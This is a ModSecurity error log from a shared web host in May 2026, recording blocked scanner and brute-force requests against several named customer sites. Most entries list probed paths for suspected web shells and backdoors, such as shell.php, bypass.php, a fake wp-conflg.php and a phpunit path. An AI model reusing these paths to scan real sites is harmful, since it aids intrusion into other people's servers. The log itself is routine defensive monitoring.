[Tue May 26 13:51:36.684045 2026] [security2:error] [pid 560287:tid 560433] [client 62.60.130.228:60916] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "consultrgb.com"] [uri "/wp-login.php"] [unique_id "ahVYEJmX5s6sDS3wJVcYpAAAAJQ"], referer: https://wordpress.org/
[Tue May 26 13:51:36.758011 2026] [security2:error] [pid 560287:tid 560543] [client 15.235.169.50:54334] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/js/network.php"] [unique_id "ahVYEJmX5s6sDS3wJVcYpQAAAPs"]
[Tue May 26 13:51:36.858162 2026] [security2:error] [pid 555743:tid 555950] [client 37.139.53.229:60596] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVYEMjqAquC0YaxQjC4jwAAAVc"], referer: https://anujtradingco.com
[Tue May 26 13:51:37.024692 2026] [security2:error] [pid 555743:tid 555949] [client 185.192.71.226:54361] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/images/smilies/about.php"] [unique_id "ahVYEcjqAquC0YaxQjC4nQAAAVY"]
[Tue May 26 13:51:37.025341 2026] [security2:error] [pid 560287:tid 560476] [client 20.196.127.68:14508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/r.php"] [unique_id "ahVYEZmX5s6sDS3wJVcYpwAAALw"]
[Tue May 26 13:51:37.195287 2026] [core:error] [pid 555743:tid 555974] [client 62.60.130.228:60187] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:51:37.195304 2026] [core:error] [pid 555743:tid 555974] [client 62.60.130.228:60187] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:51:37.256130 2026] [security2:error] [pid 555743:tid 555915] [client 15.235.169.50:54390] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-signup.php"] [unique_id "ahVYEcjqAquC0YaxQjC4pAAAATQ"]
[Tue May 26 13:51:37.410600 2026] [security2:error] [pid 555743:tid 555935] [client 91.230.225.177:43121] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/js/crop/admin.php"] [unique_id "ahVYEcjqAquC0YaxQjC4qwAAAUg"]
[Tue May 26 13:51:37.412451 2026] [security2:error] [pid 555743:tid 555993] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYEMjqAquC0YaxQjC4nAAAAYI"]
[Tue May 26 13:51:37.642143 2026] [security2:error] [pid 555743:tid 555986] [client 20.196.127.68:13253] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/sid3.php"] [unique_id "ahVYEcjqAquC0YaxQjC4tAAAAXs"]
[Tue May 26 13:51:37.729195 2026] [security2:error] [pid 555743:tid 555996] [client 15.235.169.50:54473] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/class.php"] [unique_id "ahVYEcjqAquC0YaxQjC4tQAAAYU"]
[Tue May 26 13:51:37.811668 2026] [security2:error] [pid 555743:tid 555917] [client 185.92.25.108:24311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/PHPMailer/wp-conflg.php"] [unique_id "ahVYEcjqAquC0YaxQjC4tgAAATY"]
[Tue May 26 13:51:38.169790 2026] [security2:error] [pid 555743:tid 555960] [client 142.147.175.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVYEcjqAquC0YaxQjC4sAAAAWE"]
[Tue May 26 13:51:38.205701 2026] [security2:error] [pid 555743:tid 555931] [client 15.235.169.50:54535] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/network/about.php"] [unique_id "ahVYEsjqAquC0YaxQjC4wAAAAUQ"]
[Tue May 26 13:51:38.227148 2026] [security2:error] [pid 555743:tid 555983] [client 91.230.225.177:61091] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/PHPMailer/admin.php"] [unique_id "ahVYEsjqAquC0YaxQjC4wQAAAXg"]
[Tue May 26 13:51:38.286227 2026] [security2:error] [pid 555743:tid 555911] [client 20.196.127.68:14004] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/ss.php"] [unique_id "ahVYEsjqAquC0YaxQjC4wgAAATA"]
[Tue May 26 13:51:38.689347 2026] [security2:error] [pid 555743:tid 555899] [client 15.235.169.50:54611] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/themes.php"] [unique_id "ahVYEsjqAquC0YaxQjC4xwAAASQ"]
[Tue May 26 13:51:38.906039 2026] [security2:error] [pid 560287:tid 560431] [client 20.196.127.68:13282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/sts.php"] [unique_id "ahVYEpmX5s6sDS3wJVcYwAAAAJI"]
[Tue May 26 13:51:38.957536 2026] [security2:error] [pid 560287:tid 560494] [client 91.230.225.167:59049] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/widgets/wp-login.php"] [unique_id "ahVYEpmX5s6sDS3wJVcYvAAAAM0"]
[Tue May 26 13:51:39.152912 2026] [security2:error] [pid 555743:tid 555893] [client 15.235.169.50:54703] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/uploads/wp-login.php"] [unique_id "ahVYE8jqAquC0YaxQjC4zgAAAR4"]
[Tue May 26 13:51:39.433312 2026] [security2:error] [pid 560287:tid 560424] [client 91.230.225.166:57455] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/files/index.php"] [unique_id "ahVYE5mX5s6sDS3wJVcYzQAAAIs"]
[Tue May 26 13:51:39.530743 2026] [security2:error] [pid 560287:tid 560550] [client 20.196.127.68:13292] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/shell.php"] [unique_id "ahVYE5mX5s6sDS3wJVcY0QAAAQI"]
[Tue May 26 13:51:39.645573 2026] [security2:error] [pid 560287:tid 560502] [client 15.235.169.50:54768] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/cgi-bin/wp-login.php"] [unique_id "ahVYE5mX5s6sDS3wJVcY1QAAANQ"]
[Tue May 26 13:51:39.942160 2026] [security2:error] [pid 560287:tid 560490] [client 85.208.96.200:11674] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVYE5mX5s6sDS3wJVcY3wAAAMk"]
[Tue May 26 13:51:39.942301 2026] [security2:error] [pid 560287:tid 560490] [client 85.208.96.200:11674] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVYE5mX5s6sDS3wJVcY3wAAAMk"]
[Tue May 26 13:51:40.092310 2026] [security2:error] [pid 560287:tid 560488] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYE5mX5s6sDS3wJVcY2AAAAMc"]
[Tue May 26 13:51:40.142891 2026] [security2:error] [pid 560287:tid 560531] [client 15.235.169.50:54863] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/%20.php"] [unique_id "ahVYFJmX5s6sDS3wJVcY6AAAAPE"]
[Tue May 26 13:51:40.187109 2026] [security2:error] [pid 555743:tid 555966] [client 91.230.225.171:65075] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 171.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/PHPMailer/options.php"] [unique_id "ahVYFMjqAquC0YaxQjC41wAAAWc"]
[Tue May 26 13:51:40.221110 2026] [security2:error] [pid 560287:tid 560541] [client 20.196.127.68:15738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/setup-config.php"] [unique_id "ahVYFJmX5s6sDS3wJVcY6wAAAPk"]
[Tue May 26 13:51:40.627485 2026] [security2:error] [pid 555743:tid 555974] [client 15.235.169.50:54939] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/x/index.php"] [unique_id "ahVYFMjqAquC0YaxQjC43gAAAW8"]
[Tue May 26 13:51:40.857575 2026] [security2:error] [pid 560287:tid 560418] [client 20.196.127.68:13977] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/t.php"] [unique_id "ahVYFJmX5s6sDS3wJVcY9QAAAIU"]
[Tue May 26 13:51:41.102237 2026] [security2:error] [pid 560287:tid 560464] [client 15.235.169.50:54990] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/certificates/plugins.php"] [unique_id "ahVYFZmX5s6sDS3wJVcY_AAAALE"]
[Tue May 26 13:51:41.481043 2026] [security2:error] [pid 555743:tid 555940] [client 20.196.127.68:13526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/up.php"] [unique_id "ahVYFcjqAquC0YaxQjC46QAAAU0"]
[Tue May 26 13:51:41.568675 2026] [security2:error] [pid 555743:tid 555929] [client 15.235.169.50:55048] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/autoplugin/vendor/xMAN.php"] [unique_id "ahVYFcjqAquC0YaxQjC46gAAAUI"]
[Tue May 26 13:51:41.589660 2026] [security2:error] [pid 560287:tid 560483] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYFZmX5s6sDS3wJVcZAAAAAMI"]
[Tue May 26 13:51:41.608294 2026] [security2:error] [pid 560287:tid 560451] [client 185.92.25.94:42785] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 94.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/inc.php"] [unique_id "ahVYFZmX5s6sDS3wJVcZAwAAAKU"]
[Tue May 26 13:51:41.826462 2026] [security2:error] [pid 560287:tid 560452] [client 129.222.147.134:28446] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYFZmX5s6sDS3wJVcZBwAAAKY"]
[Tue May 26 13:51:41.826667 2026] [security2:error] [pid 560287:tid 560452] [client 129.222.147.134:28446] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYFZmX5s6sDS3wJVcZBwAAAKY"]
[Tue May 26 13:51:42.033362 2026] [security2:error] [pid 555743:tid 555901] [client 15.235.169.50:55109] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/css/Marvins.php"] [unique_id "ahVYFsjqAquC0YaxQjC47gAAASY"]
[Tue May 26 13:51:42.062552 2026] [security2:error] [pid 555743:tid 555903] [client 20.196.127.68:13285] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/ultra.php"] [unique_id "ahVYFsjqAquC0YaxQjC47wAAASg"]
[Tue May 26 13:51:42.340416 2026] [security2:error] [pid 555743:tid 555944] [client 106.192.248.115:51085] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYFsjqAquC0YaxQjC49AAAAVE"]
[Tue May 26 13:51:42.340575 2026] [security2:error] [pid 555743:tid 555944] [client 106.192.248.115:51085] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYFsjqAquC0YaxQjC49AAAAVE"]
[Tue May 26 13:51:42.524358 2026] [security2:error] [pid 560287:tid 560549] [client 15.235.169.50:55165] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/Text/wp-login.php"] [unique_id "ahVYFpmX5s6sDS3wJVcZHgAAAQE"]
[Tue May 26 13:51:42.687696 2026] [security2:error] [pid 560287:tid 560488] [client 20.196.127.68:14938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/vv.php"] [unique_id "ahVYFpmX5s6sDS3wJVcZHwAAAMc"]
[Tue May 26 13:51:42.779205 2026] [security2:error] [pid 560287:tid 560546] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYFpmX5s6sDS3wJVcZGAAAAP4"]
[Tue May 26 13:51:43.009722 2026] [security2:error] [pid 560287:tid 560465] [client 15.235.169.50:55281] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/images/Marvins.php"] [unique_id "ahVYF5mX5s6sDS3wJVcZKwAAALI"]
[Tue May 26 13:51:43.128479 2026] [security2:error] [pid 555743:tid 555982] [client 185.192.71.239:48561] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 239.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/index.php"] [unique_id "ahVYF8jqAquC0YaxQjC5AAAAAXc"]
[Tue May 26 13:51:43.234687 2026] [security2:error] [pid 555743:tid 555876] [client 47.128.51.49:44106] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "gcirsm.org.in"] [uri "/robots.txt"] [unique_id "ahVYF8jqAquC0YaxQjC5BgAAAQ0"]
[Tue May 26 13:51:43.289029 2026] [security2:error] [pid 555743:tid 555973] [client 20.196.127.68:13303] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/V5.php"] [unique_id "ahVYF8jqAquC0YaxQjC5BwAAAW4"]
[Tue May 26 13:51:43.453056 2026] [security2:error] [pid 555743:tid 555981] [client 185.92.25.98:51099] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/filemanager.php"] [unique_id "ahVYF8jqAquC0YaxQjC5CwAAAXY"]
[Tue May 26 13:51:43.494187 2026] [security2:error] [pid 555743:tid 555889] [client 15.235.169.50:55362] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/languages/as.php"] [unique_id "ahVYF8jqAquC0YaxQjC5DAAAARo"]
[Tue May 26 13:51:43.920995 2026] [security2:error] [pid 560287:tid 560495] [client 20.196.127.68:15685] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/wp-user.php"] [unique_id "ahVYF5mX5s6sDS3wJVcZMwAAAM4"]
[Tue May 26 13:51:43.983897 2026] [security2:error] [pid 560287:tid 560510] [client 15.235.169.50:55467] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/js/tinymce/profile.php"] [unique_id "ahVYF5mX5s6sDS3wJVcZNAAAANw"]
[Tue May 26 13:51:44.118608 2026] [security2:error] [pid 560287:tid 560492] [client 185.192.71.236:44353] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/cgi-bin/bypass.php"] [unique_id "ahVYGJmX5s6sDS3wJVcZPQAAAMs"]
[Tue May 26 13:51:44.460903 2026] [security2:error] [pid 560287:tid 560485] [client 15.235.169.50:55542] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/images/wp-login.php"] [unique_id "ahVYGJmX5s6sDS3wJVcZRQAAAMQ"]
[Tue May 26 13:51:44.501107 2026] [security2:error] [pid 560287:tid 560451] [client 20.196.127.68:13512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/wp-blog.php"] [unique_id "ahVYGJmX5s6sDS3wJVcZRgAAAKU"]
[Tue May 26 13:51:44.538936 2026] [security2:error] [pid 560287:tid 560442] [client 185.192.71.235:38587] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/.well-known/pki-validation/admin.php"] [unique_id "ahVYGJmX5s6sDS3wJVcZSQAAAJw"]
[Tue May 26 13:51:44.936986 2026] [security2:error] [pid 560287:tid 560506] [client 15.235.169.50:55616] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/kill.php"] [unique_id "ahVYGJmX5s6sDS3wJVcZUgAAANg"]
[Tue May 26 13:51:45.016061 2026] [security2:error] [pid 560287:tid 560423] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYGJmX5s6sDS3wJVcZSgAAAIo"]
[Tue May 26 13:51:45.074043 2026] [security2:error] [pid 555743:tid 555940] [client 91.230.225.177:36355] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/IXR/admin.php"] [unique_id "ahVYGcjqAquC0YaxQjC5KQAAAU0"]
[Tue May 26 13:51:45.140088 2026] [security2:error] [pid 560287:tid 560433] [client 20.196.127.68:14562] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/wp.php"] [unique_id "ahVYGZmX5s6sDS3wJVcZUwAAAJQ"]
